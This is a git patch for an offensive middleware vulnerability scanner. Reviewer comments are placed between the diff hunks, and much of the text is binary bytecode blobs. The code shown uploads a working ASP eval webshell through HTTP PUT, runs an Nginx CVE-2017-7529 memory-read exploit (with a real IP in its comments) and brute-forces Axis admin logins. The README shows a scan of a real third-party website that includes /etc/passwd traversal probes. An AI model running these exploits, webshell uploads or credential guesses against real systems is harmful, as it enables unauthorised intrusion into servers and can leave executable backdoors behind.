From ca723d669c1b2bc63a4bc935ea7dcf0779abf005 Mon Sep 17 00:00:00 2001 
From: nihaohello <34113556+nihaohello@users.noreply.github.com> Date: Sat, 30 Mar 2019 23:03:09 +0800 Subject: [PATCH] complete --- N-MiddlewareScan.py | 16 +- README.md | 130 +++++ __pycache__/config.cpython-37.pyc | Bin 180 -> 342 bytes _update.py | 0 config.py | 22 +- old_plugins/axis.py | 16 +- plugins/IIS_special_plugin_.py | 42 ++ plugins/Nginx_special_plugin_.py | 30 ++ .../IIS_special_plugin_.cpython-37.pyc | Bin 0 -> 1493 bytes .../Nginx_special_plugin_.cpython-37.pyc | Bin 0 -> 1285 bytes .../__pycache__/axis_plugin.cpython-37.pyc | Bin 1249 -> 1264 bytes .../__pycache__/jboss_plugin.cpython-37.pyc | Bin 0 -> 777 bytes .../jboss_special_plugin_.cpython-37.pyc | Bin 0 -> 1156 bytes plugins/__pycache__/plugins.cpython-37.pyc | Bin 2257 -> 4225 bytes .../__pycache__/resin_plugin.cpython-37.pyc | Bin 1598 -> 1879 bytes .../special_plugin_.cpython-37.pyc | Bin 0 -> 1271 bytes .../spring_special_plugin_.cpython-37.pyc | Bin 0 -> 2210 bytes .../__pycache__/struts2_plugin.cpython-37.pyc | Bin 0 -> 264 bytes .../struts2_special_plugin_.cpython-37.pyc | Bin 0 -> 31439 bytes .../__pycache__/tomcat_plugin.cpython-37.pyc | Bin 0 -> 287 bytes .../tomcat_special_plugin_.cpython-37.pyc | Bin 0 -> 3132 bytes plugins/__pycache__/user_agent.cpython-37.pyc | Bin 24707 -> 24826 bytes .../weblogic_plugin.cpython-37.pyc | Bin 0 -> 265 bytes .../weblogic_special_plugin_.cpython-37.pyc | Bin 0 -> 1607 bytes plugins/axis_plugin.py | 4 +- plugins/jboss_plugin.py | 53 ++ plugins/jboss_special_plugin_.py | 23 + plugins/plugins.py | 172 ++++--- plugins/special_plugin_.py | 28 ++ plugins/spring_special_plugin_.py | 64 +++ plugins/struts2_plugin.py | 15 + plugins/struts2_special_plugin_.py | 458 ++++++++++++++++++ plugins/test.py | 7 - plugins/tomcat_plugin.py | 15 + plugins/tomcat_special_plugin_.py | 84 ++++ plugins/user_agent.py | 2 +- plugins/weblogic_exp/CVE_2017_10271_linux.py | 150 ++++++ plugins/weblogic_exp/CVE_2017_10271_win.py | 121 +++++ plugins/weblogic_exp/CVE_2018_2893.py 
| 73 +++ plugins/weblogic_exp/CVE_2018_2894.py | 132 +++++ plugins/weblogic_exp/__init__.py | 10 + plugins/weblogic_plugin.py | 15 + plugins/weblogic_poc/CVE_2015_4852.py | 57 +++ plugins/weblogic_poc/CVE_2016_0638.py | 68 +++ plugins/weblogic_poc/CVE_2016_3510.py | 68 +++ plugins/weblogic_poc/CVE_2017_3248.py | 68 +++ plugins/weblogic_poc/CVE_2017_3506.py | 72 +++ plugins/weblogic_poc/CVE_2018_2628.py | 80 +++ plugins/weblogic_poc/CVE_2018_2893.py | 85 ++++ plugins/weblogic_poc/__init__.py | 10 + .../__pycache__/CVE_2015_4852.cpython-37.pyc | Bin 0 -> 4462 bytes .../__pycache__/CVE_2016_0638.cpython-37.pyc | Bin 0 -> 11024 bytes .../__pycache__/CVE_2016_3510.cpython-37.pyc | Bin 0 -> 11041 bytes .../__pycache__/CVE_2017_3248.cpython-37.pyc | Bin 0 -> 10996 bytes .../__pycache__/CVE_2017_3506.cpython-37.pyc | Bin 0 -> 2528 bytes .../__pycache__/CVE_2018_2628.cpython-37.pyc | Bin 0 -> 7184 bytes .../__pycache__/CVE_2018_2893.cpython-37.pyc | Bin 0 -> 7405 bytes .../__pycache__/__init__.cpython-37.pyc | Bin 0 -> 447 bytes .../__pycache__/managerURL200.cpython-37.pyc | Bin 0 -> 1270 bytes .../__pycache__/uddi_ssrf.cpython-37.pyc | Bin 0 -> 1227 bytes plugins/weblogic_poc/managerURL200.py | 32 ++ plugins/weblogic_poc/uddi_ssrf.py | 31 ++ plugins/weblogic_special_plugin_.py | 51 ++ 63 files changed, 2218 insertions(+), 86 deletions(-) create mode 100644 _update.py create mode 100644 plugins/IIS_special_plugin_.py create mode 100644 plugins/Nginx_special_plugin_.py create mode 100644 plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/jboss_plugin.cpython-37.pyc create mode 100644 plugins/__pycache__/jboss_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/spring_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/struts2_plugin.cpython-37.pyc create 
mode 100644 plugins/__pycache__/struts2_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/tomcat_plugin.cpython-37.pyc create mode 100644 plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/weblogic_plugin.cpython-37.pyc create mode 100644 plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc create mode 100644 plugins/jboss_plugin.py create mode 100644 plugins/jboss_special_plugin_.py create mode 100644 plugins/special_plugin_.py create mode 100644 plugins/spring_special_plugin_.py create mode 100644 plugins/struts2_plugin.py create mode 100644 plugins/struts2_special_plugin_.py delete mode 100644 plugins/test.py create mode 100644 plugins/tomcat_plugin.py create mode 100644 plugins/tomcat_special_plugin_.py create mode 100644 plugins/weblogic_exp/CVE_2017_10271_linux.py create mode 100644 plugins/weblogic_exp/CVE_2017_10271_win.py create mode 100644 plugins/weblogic_exp/CVE_2018_2893.py create mode 100644 plugins/weblogic_exp/CVE_2018_2894.py create mode 100644 plugins/weblogic_exp/__init__.py create mode 100644 plugins/weblogic_plugin.py create mode 100644 plugins/weblogic_poc/CVE_2015_4852.py create mode 100644 plugins/weblogic_poc/CVE_2016_0638.py create mode 100644 plugins/weblogic_poc/CVE_2016_3510.py create mode 100644 plugins/weblogic_poc/CVE_2017_3248.py create mode 100644 plugins/weblogic_poc/CVE_2017_3506.py create mode 100644 plugins/weblogic_poc/CVE_2018_2628.py create mode 100644 plugins/weblogic_poc/CVE_2018_2893.py create mode 100644 plugins/weblogic_poc/__init__.py create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc create mode 
100644 plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc create mode 100644 plugins/weblogic_poc/managerURL200.py create mode 100644 plugins/weblogic_poc/uddi_ssrf.py create mode 100644 plugins/weblogic_special_plugin_.py diff --git a/N-MiddlewareScan.py b/N-MiddlewareScan.py index f031188..b3ab397 100644 --- a/N-MiddlewareScan.py +++ b/N-MiddlewareScan.py @@ -11,16 +11,16 @@ from concurrent.futures import ThreadPoolExecutor from plugins import plugins #80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080 class MiddlewareScan(object): - def __init__(self,url,options): - self.url=url - self.options=options + def __init__(self,arg,ThreadNum): + self.arg=arg + self.ThreadNum=ThreadNum def run(self): - P = plugins.plugins(self.url,self.options) + P = plugins.plugins(self.arg,self.ThreadNum) P.run() def main(): arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete') arg.add_argument('-u', '--url', help='url site', dest='url') - arg.add_argument('-i', '--file', help='file name', dest='file') + arg.add_argument('-i', '--file', help='file name , fill url ', dest='file') arg.add_argument('-p', '--options', help='options', dest='options') arg.add_argument('-t', '--thread', help='thread num', dest='thread') arg = arg.parse_args() @@ -30,7 +30,7 @@ def main(): arg.options="all" if arg.url: try: - S=MiddlewareScan(arg.url,arg.options) + S=MiddlewareScan(arg,config) S.run() except Exception: print(traceback.print_exc()) 
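Review bot: `MiddlewareScan.__init__(self,arg,ThreadNum)` names its second parameter as a thread count, but the call site in this hunk's `-u` branch of `main()`, `S=MiddlewareScan(arg,config)`, passes the `config` module, and the `-i` loop in the following hunk does the same, so `self.ThreadNum` holds the config object and the parsed `arg.thread` option is never consumed. Either rename the parameter to match what is passed, `def __init__(self, arg, config):` with `self.config = config`, or pass `arg.thread` and keep the name. `plugins.plugins(self.arg,self.ThreadNum)` in `run` forwards the same mislabelled value; the signature of `plugins.plugins`, which is not visible here, should decide which of the two fixes is right.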
@@ -41,14 +41,14 @@ def main(): for url in f.readlines(): try: url=url.rstrip("\n") - S=MiddlewareScan(url,arg.options) + S=MiddlewareScan(arg,config) excetor.submit(S.run()) except Exception: pass f.close() except Exception: print(traceback.print_exc()) - print("相关漏洞检测完成。") + print("\n\n相关漏洞检测完成。") if __name__ == '__main__': print("开始检测中间件相关漏洞:") main() \ No newline at end of file diff --git a/README.md b/README.md index 191c69c..41f96c8 100644 --- a/README.md +++ b/README.md 
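Review bot: In the file-input loop the new line `S=MiddlewareScan(arg,config)` drops the per-line `url` that the preceding `url=url.rstrip("\n")` just computed, so every entry of the `-i` file scans `arg.url` (which is `None` when only `-i` was given) instead of the line that was read. The value read from the file has to reach the scanner, for example `arg.url=url` immediately before the constructor call, or an explicit extra argument. The surrounding context line `excetor.submit(S.run())` calls `S.run()` synchronously and submits its `None` return value, so the pool never runs scans in parallel; that line predates this change but the new constructor call depends on it. `main()` begins outside this hunk.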
@@ -1,5 +1,135 @@ +1. 最近在看web中间件的漏洞 看到一个三年前的脚本:https://github.com/ywolf/F-MiddlewareScan 想着自己写一个中间件相关的,正是脚本好写,poc和exp难 github链接:https://github.com/nihaohello/N-MiddlewareScan + + +2. +#plugins vuln poc exp +主要是下面模块: +1.axis +xss 弱密码 +2.glashfish +3.jboss +4.resin +5.weblogic +6.tomcat +7.struts2 +8.IIS +9.fastcgi +10.phpcgi +11.apache +12.nginx +13.spring mvc + + +借用和拉用了(有些也许没有写到): +axis,glassfish,nginx,iis: +https://github.com/rabbitmask/WeblogicR + + +jboss: +https://github.com/search?l=Python&q=jboss&type=Repositories +https://github.com/SkewwG/VulScan/blob/master/Jboss/CVE-2017-12149.py + +weblogic: +https://github.com/search?l=Python&q=weblogic&type=Repositories +https://www.exploit-db.com/ :有poc +https://nvd.nist.gov/vuln/detail/CVE-2017-10271 +https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html +https://github.com/rabbitmask/WeblogicR poc来自这 +https://github.com/kingkaki/weblogic-scan + + +tomcat: +https://github.com/search?l=Python&q=tomcat&type=Repositories +https://github.com/SkewwG/VulScan + + +struts2: +https://github.com/search?l=Python&q=struts2&type=Repositories + + +spring: +http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=spring +https://www.exploit-db.com/ 18年 + + + + + + +3. 
+测试例子: +python N-MiddlewareScan.py -u https://www.baidu.com + +第一部分standard_poc 测试开始: +*********************** +https://www.baidu.com CVE_2018_10661 测试结束 +https://www.baidu.com/axis2/axis2-web/HappyAxis.jsp信息扫描完成 +https://www.baidu.com/axis2/axis2-admin/login弱口令扫描完成 +https://www.baidu.com/j_security_check?loginButton=Login 测试结束 +https://www.baidu.com exist Directory_traversal vuln 测试结束 +https://www.baidu.com/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 扫描完成 +https://www.baidu.com/web-console/Invoker 扫描完成 +https://www.baidu.com/invoker/JMXInvokerServlet 扫描完成 +https://www.baidu.com/admin-console/ 扫描完成 +https://www.baidu.com/resin-admin/j_security_check?j_uri=index.php扫描完成 +https://www.baidu.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成 +https://www.baidu.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成 +https://www.baidu.com/%20..\web-inf扫描完成 +https://www.baidu.com/%3f.jsp扫描完成 +https://www.baidu.com/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成 + + + +第一部分 standard_poc 没有测试出任何的漏洞。 + + + +第二部分: +开始测试特定的poc脚本: +*********************** +对tomcat weak password 进行检测 +CVE_2015_4852 脚本出错 +CVE_2016_0638 脚本出错 +CVE_2016_3510 脚本出错 +CVE_2017_3248 脚本出错 +[-]目标weblogic未检测到CVE-2017-3506 +CVE_2018_2893 脚本出错 +CVE_2018_2628 脚本出错 +managerURL200 脚本出错 +uddi_ssrf 脚本出错 +CVE_2017_12149 检测函数出错 +https://www.baidu.com +Code by Lucifer. +-------检测struts2漏洞-------- +目标url:https://www.baidu.com +目标不存在struts2-005漏洞.. +目标不存在struts2-009漏洞.. +目标不存在struts2-013漏洞.. +检测struts2-016超时.. +超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6) +目标不存在struts2-019漏洞.. +检测struts2-devmode超时.. +超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6) +目标不存在struts2-032漏洞.. +目标不存在struts2-033漏洞.. +目标不存在struts2-037漏洞.. +目标不存在struts2-045漏洞.. +目标不存在struts2-046漏洞.. 
+目标不存在struts2-048漏洞.. +目标不存在struts2-020漏洞.. +目标不存在struts2-052漏洞.. +目标不存在struts2-053漏洞.. +目标不存在struts2-057漏洞..(只提供检测) +[-]不存在SpringCVE-2017-8046漏洞! +[-] https://www.baidu.com 不存在IIS PUT上传 +Server 不存在 IIS shortname vulnerable +Server 不存在 IIS shortname vulnerable +[-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危) + + +相关漏洞检测完成。 diff --git a/__pycache__/config.cpython-37.pyc b/__pycache__/config.cpython-37.pyc index 8f9631c53a9760e6c3e5f3eef66bf04073a3f9ac..9cdb7ba97ffe7c802f7b1263e799d39d5287ebd7 100644 GIT binary patch literal 342 zcmZXQ%SyvQ6ox0w6@Bp1W z2E&VDp5z(OG!Yr76E+0xcEXqg`kdMJ{S0W|o-#0Qrh}0??g1Uldk$!`(b!{OL}>C6 zC4RcYOF!L&i$KJ!R3tAv%zUSH7a=bBYaqBA2CM&zFj+lC&&TOzYhJ|(=1bl!erJ6k MK^2+(lEq2p7j73)vH$=8 delta 128 zcmcb{w1tt+iIU#Gic%9( z{7Q3IG88cb1;NBuPaw', 'System Components', 'axis2-admin/upload', 'include page="footer.inc">', 'axis2-admin/logout'] - user_list = ['axis', 'admin', 'manager', 'root'] - pass_list = ['', 'axis', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', + user_list = ['axis_plugin_catalog', 'admin', 'manager', 'root'] + pass_list = ['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'] for user in user_list: for password in pass_list: @@ -31,14 +31,14 @@ def axis_admin(host): request = requests.post(url=login_url, data=PostStr, headers=headers) res_html = res.text except Exception: - return 'axis no weak password。' + return 'axis_plugin_catalog no weak password。' for flag in flag_list: if flag in res_html: info = '%s Axis Weak password %s:%s' % (login_url, user, password) return 'YES|' + info - return 'axis no weak password。' + return 'axis_plugin_catalog no weak password。' except Exception: - return 'axis no weak password。' + return 'axis_plugin_catalog no weak password。' def axis_info(host): try: 
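Review bot: Replacing `'axis'` with `'axis_plugin_catalog'` in the return strings of `axis_admin` (`return 'axis_plugin_catalog no weak password。'`, three occurrences in this hunk, and the matching `'no axis_plugin_catalog info。'` lines in the `axis_info` hunk that follows) reads like an unintended global find-and-replace rather than a deliberate wording change. The same substitution is visible at the top of this line in the file's earlier hunk, where the `user_list` and `pass_list` entries `'axis'` became `'axis_plugin_catalog'`, which silently changes the credentials the check actually tests. If the goal was only to label the output, keep the data lists unchanged and restore the messages, e.g. `return 'axis no weak password。'`. `axis_admin` starts outside this hunk.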
@@ -49,13 +49,13 @@ def axis_info(host): s = requests.get(url=url, headers=headers) res_html = s.text except Exception: - return 'no axis info。' + return 'no axis_plugin_catalog info。' if "Axis2 Happiness Page" in res_html: info = vul_url + " Axis Information Disclosure" return 'YES|' + info - return 'no axis info。' + return 'no axis_plugin_catalog info。' except Exception: - return 'no axis info。' + return 'no axis_plugin_catalog info。' def axis(url): cve__2018_10661=CVE_2018_10661(url) print(cve__2018_10661) diff --git a/plugins/IIS_special_plugin_.py b/plugins/IIS_special_plugin_.py new file mode 100644 index 0000000..0cd709b --- /dev/null +++ b/plugins/IIS_special_plugin_.py 
@@ -0,0 +1,42 @@ +#coding=utf-8 +import requests +import sys +import http.client +import urllib.parse +import threading +import queue +import time +def IIS_PUT(arg,config): + try: + url = arg.url + data = '<%eval request("1111111111")%>' + res = requests.put(url=url, data=data, timeout=5) + html_text = requests.get(url).text + if '<%eval request("1111111111")%>' in html_text: + print(('[+] {} 存在IIS PUT上传'.format(url))) + requests.delete(url) + print(('[+] {} 成功删除测试文件'.format(url))) + else: + print(('[-] {} 不存在IIS PUT上传'.format(url))) + except Exception as e: + print(e) + +def IIS_shortname_Scanner(url): + try: + for _method in ['GET', 'OPTIONS']: + if _method == 'GET': + status_1 = requests.get(url+ '/*~1*/a.aspx') # an existed file/folder + status_2 = requests.get(url + '/l1j1e*~1*/a.aspx') # not existed file/folder + else: + status_1 = requests.options(url + '/*~1*/a.aspx') # an existed file/folder + status_2 = requests.options(url + '/l1j1e*~1*/a.aspx') # not existed file/folder + if status_1.status_code == 404 and status_2.status_code != 404: + print("Server 存在 IIS shortname vulnerable") + else: + print("Server 不存在 IIS shortname vulnerable") + return False + except Exception as e: + raise Exception('[is_vul.Exception] %s' % str(e)) +def IIS_special_plugin_(arg,config): + IIS_PUT(arg,config) + IIS_shortname_Scanner(arg.url) \ No newline at end of file diff --git a/plugins/Nginx_special_plugin_.py b/plugins/Nginx_special_plugin_.py new file mode 100644 index 0000000..699c101 --- /dev/null +++ b/plugins/Nginx_special_plugin_.py 
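Review bot: `IIS_PUT` writes server-side executable content (`data = '<%eval request("1111111111")%>'`) to the target and then treats `requests.delete(url)` as successful without checking its status, so a host where PUT is accepted but DELETE is refused, or where the follow-up `requests.get(url)` raises (it has no `timeout`), is left with an executable test file in place. Detecting a writable PUT needs only an inert marker: `data = 'N-MiddlewareScan PUT probe'`, test for that marker in `html_text`, and confirm the cleanup with `if requests.delete(url, timeout=5).status_code not in (200, 202, 204): print('[-] {} 删除测试文件失败'.format(url))`. `IIS_shortname_Scanner` returns `False` on both branches and its caller `IIS_special_plugin_` discards the value, so the outcome exists only as a print; returning the result of the comparison would make it usable. `config` is accepted by `IIS_PUT` and `IIS_special_plugin_` but never read, and the `sys`, `http.client`, `urllib.parse`, `threading`, `queue` and `time` imports are unused.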
@@ -0,0 +1,30 @@ +#coding=utf-8 +# Nginx信息泄露!python3 NginxCVE-2017-7529.py http://207.246.80.61:8000/proxy/demo.png +# 敏感信息有KEY等等 +import requests +from termcolor import cprint + +class NginxCVE_2017_7529(): + def attack(self, url): + #url = r'http://207.246.80.61:8000/' + try: + a = requests.get(url) + start = int(a.headers['Content-Length']) + 300 + end = 0x8000000000000000 - start + + headers = { + "Range": "bytes=-{},-{}".format(start, end) + } + res = requests.get(url=url, headers=headers, stream=True, timeout=10) + ret = res.raw.read(500) + code = res.status_code + + if code == 206: + print( "[+]存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)") + else: + print("[-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)") + except Exception as e: + cprint("[-] " + __file__ + "====>连接超时", "cyan") + +def Nginx_special_plugin_(arg,config): + NginxCVE_2017_7529().attack(arg.url) \ No newline at end of file diff --git a/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc b/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..d1e159db06da0e26e1a140164250f253ab16f25a GIT binary patch literal 1493 zcmZ`(-D@0G6u%$ywVO@Y+D1jIE`=1Qk`3EODMhqZ^5C|xQR_5eneM&aoz3j*^v<1_ zth0S+1WTphgNlOC6ns#q2!c}3zvRA}1oJQW)N}7{lZf>WbH4AHbMO4ld3$!Yj9@*w z^I)~&AoQ13o-P8yTkvKpKp0{;M!|&R02`eI)Nm`X4R->^a5r!b_X3X*Mn6MAiCN4B zUS`DNrAc3BzM5ai0{VpgP}uI<_RURpztdQ zTcb_M@Flbsk8yz+StsJWL_4@ZjJ|*#;xU*&CiS!X-UJF?Oq4lzOgwfc-XmknyRFY0%ZR6+BHok))3ZAib+q#B6MhUqF z8i17IzESQp`lSFb3jkwGN~BAh?l{8I5G6(&~0I0@*)Tl zW=4UxiSB=x9z_2}^D}VMrv_psfvMRiVivZDIZZV7kJWeb89-iukW9A@g4)Ds;C{v2 z8C=9x7R>adOzWLE;?RYbR#XLsMI7Czr=iHWaweK8$)4aLi;}LgVbDW{8s!sqd6^g$A literal 0 HcmV?d00001 
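Review bot: The `except Exception as e` in `NginxCVE_2017_7529.attack` reports every failure as `连接超时`, but the body also raises `KeyError` from `a.headers['Content-Length']` when the response carries no Content-Length (chunked responses, for instance) and `ValueError` if the header is not numeric, so those targets are misreported as timeouts and `e` is never shown. Read the header defensively with its own message, e.g. `length = a.headers.get('Content-Length')` followed by `if length is None: print('[-] no Content-Length header, skipping'); return`, and narrow the timeout branch to `requests.exceptions.RequestException`. `ret = res.raw.read(500)` is assigned but never used, and the first `requests.get(url)` has no `timeout` unlike the second request. `from termcolor import cprint` adds a third-party dependency for a single message that `print` covers equally well.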
diff --git a/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc b/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..319d2dc03157988a8bb04fff1531115c4285bd5e GIT binary patch literal 1285 zcmb_c-D_M$6hAZfWAAP@F$V32p!G#?X?M}06vdX(SOl^AV5_NX%4NJW+1$Dsd*;ehr8FH zWpi>CYNc(Afo6?pH|WYRQGprn3PtB6YW5Tw0WHFzMLFRV<1KDsysc-N?J&7A`~GSF z=u0mj^N+oH^tHgm88K%zI*Xe9h^BW*!3r6WRWhWC4rs^X^g>j2Ym$d5L?=_Rt-;9cRVmWyC3=UmAJ?k5`tcjFiVGMub4(p;tBD z93-#Upvp@Xd6&SjOrXC{RrsWu*bjUP^@$O3G-nvY)vM+6@Bt+BJdUuw>1KawHcgaB zRQ(;1wAEsGgaAYi7PBiJw48TY(iZ*6k9taE$Lk*tkD#90Hnk%~RxTr5S`>^6nQ1pu zQm|N;R2YjiSK*%sxcvaP=5M3<@bHC=d*5t)`+dRd*4k%}zWjXa{;wN1zk0O(1+Hwa z-`xE9*3SATNO|2*UN@BQtbaOQXfzrxKK$**#_~_K{EUICUwHV-^8bX`w-N67{7J+; zj&fq__gkAc?rg1H-~4(_+d+>dwW{`{xR{GfW!h>Br7dhK>0*R-7g8BBoRRFZwvhv_ zCo;uUp7}w_g?5St)aBDx0?}1rnn=?}+VlN|FcQ9Bt7tnD(SkJOYr?dH(Gu}Q!p9jb zDKM+VtagD~!#od3s_vY*K-CnTBWL)pcv?BsF->jbrIgi9;CdJu+C67;Zqa2$% zn=gKapLInLvdACL`i*W+yG$t-EP0qBdj<_qN-AWAc-AzXAywj1k5p)tOq2e>$L~pF z9Nokg!6FkDW0AVz`*F&1Q?Rc3{>7X{;}v-b@r!EqnCHx#c>qeNnc>SL#rU5)Xy(j@ z;ttNBqhMt2Aav*|-j1TnNwa1ZQR5tj-x}2xlWlw!(qtiQ|0|__`adZ#R2PQ;B402d tj-0@cE-NA9AdOO4{L*nMvtbXciIt`t?Y%K3-~>K&keSx;NR>|Q`x{kmYzY7W literal 0 HcmV?d00001 diff --git a/plugins/__pycache__/axis_plugin.cpython-37.pyc b/plugins/__pycache__/axis_plugin.cpython-37.pyc index 502280fea96df0406820263eec52b7eef5310e56..fee96b47690b88e77907027ac254b3f69798c876 100644 GIT binary patch delta 189 zcmaFJ`GJ$yiITiQxkV8#(8ODuFs|h-4zPA0AIh?@ zu(-tr5xd0;rZbC6iV{omi*6~g10_KKY%EZVpC;oimV*4`;*|_VvOsf-WG5H1iIdo4>BJB 
diff --git a/plugins/__pycache__/jboss_plugin.cpython-37.pyc b/plugins/__pycache__/jboss_plugin.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5b7578d80067f3fe077b065e2a59af515e6f6270 GIT binary patch literal 777 zcmb`FPis^$5Ww^P?4Ncmdl3rKLwm98!M?k=RtrU2*j_3kwXkGgW*@J8FNv9??d~UN zvCw`1@m>T!P7k??`yo7;Z1u?#J?VrD$^2%9nM}5pmKKSV+rh`f_YFe6_{&e}y2CTK z@ysbkSdax7@rwm4WDyJJ=lDa%u|~xjjx}qnRk4<1?HXIC*n(q=zgQL@5Z2izy?Zu# zvHfbgmmHO6k5a)=6p*~sW$~O*sfF64sm=xO=Nu)ZdawnQKjgH8{?SMvZr}tpl#lg9 zLVq9B38)=D7M7T|uB-o>bai&|X?At>_4DQI{JPh%T?Ow9pvIw)zD64vRoJGaik4_& zMm4qZxS*MBp-EFfXB^YKun}-(JCv0UjQ2#mwXtVA!{1w;pbd!0NRTXB%2iI-2h`nB5V<}R+ wAj|AZxQTvBzHTY-h$z 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 
